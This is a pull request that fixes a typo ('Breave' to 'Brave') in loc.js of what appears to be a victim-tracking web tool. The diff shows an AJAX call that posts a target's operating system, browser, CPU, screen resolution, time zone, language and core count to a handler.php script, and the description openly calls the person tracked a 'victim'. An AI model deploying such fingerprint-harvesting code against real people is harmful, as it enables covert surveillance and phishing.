### PR TITLE
Fix typo

### DIFF
--- a/storm-web/assets/js/loc.js
+++ b/storm-web/assets/js/loc.js
@@ -48,7 +48,7 @@ function mydata(){
         $.ajax({
             type: 'POST',
             url: 'handler.php',
-            data: {"data":`ip : I could not find. Because the browser is a victim of Breave \nos name : ${OS} \nVersion : ${ver} \nBrowser Name : ${getbrow} \nGet Browser Version : ${getbrowVer} \nCpu Name : ${CPU} \nResolution : ${currentResolution} \nTime Zone : ${timeZone} \nLanguage :  ${language} \nNumber Of CPU Core :  ${core}`},
+            data: {"data":`ip : I could not find. Because the browser is a victim of Brave \nos name : ${OS} \nVersion : ${ver} \nBrowser Name : ${getbrow} \nGet Browser Version : ${getbrowVer} \nCpu Name : ${CPU} \nResolution : ${currentResolution} \nTime Zone : ${timeZone} \nLanguage :  ${language} \nNumber Of CPU Core :  ${core}`},
             mimeType: 'text'
             });
 


### PR DESCRIPTION
When the victim uses Brave Browser, a message is displayed stating that the IP address could not be recovered because of Brave. However, this message displays "Breave" instead of "Brave". This PR fixes the typo.

@joshkar 